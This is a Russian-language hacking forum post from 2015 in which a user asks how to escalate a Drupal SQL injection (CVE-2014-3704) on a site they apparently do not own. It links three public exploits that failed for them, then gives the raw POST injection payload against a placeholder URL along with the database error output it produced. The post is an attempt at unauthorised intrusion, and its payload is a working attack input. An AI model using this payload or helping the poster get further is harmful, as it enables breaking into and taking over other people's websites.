Ваши вопросы по уязвимостям.

#11

06.02.2015, 18:21

Vip77

Участник форума

Регистрация: 29.09.2012

Сообщений: 233

С нами: 7167926

Репутация: 20

Есть сайт со sqli (старая версия drupal) CVE-2014-3704

Использовал следующие эксплоиты:

http://www.exploit-db.com/exploits/34993/

http://www.exploit-db.com/exploits/34992/

http://www.exploit-db.com/exploits/34984/

Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан.

Как раскрутить я не знаю.

Sqli при пост запросе:

http://www.site.com/?q=node&destination=node

name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=us er_login_block&op=Log%2Bin

output:

Цитата:

Сообщение от None

Warning: mb_strlen() expects parameter 1 to be string, array given in drupal_strlen() (Zeile 478 von /pages/bd/asd/home/htdocs/site/includes/unicode.inc).
Warning: addcslashes() expects parameter 1 to be string, array given in DatabaseConnection->escapeLike() (Zeile 981 von /pages/bd/asd/home/htdocs/site/includes/database/database.inc).
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asd' AND status = 1' at line 1: SELECT * FROM {users} WHERE name = :name_0', :name_0 AND status = 1; Array ( [:name_0'] => 0; [:name_0] => asd ) in user_login_authenticate_validate() (Zeile 2148 von /pages/bd/asd/home/htdocs/site/modules/user/user.module).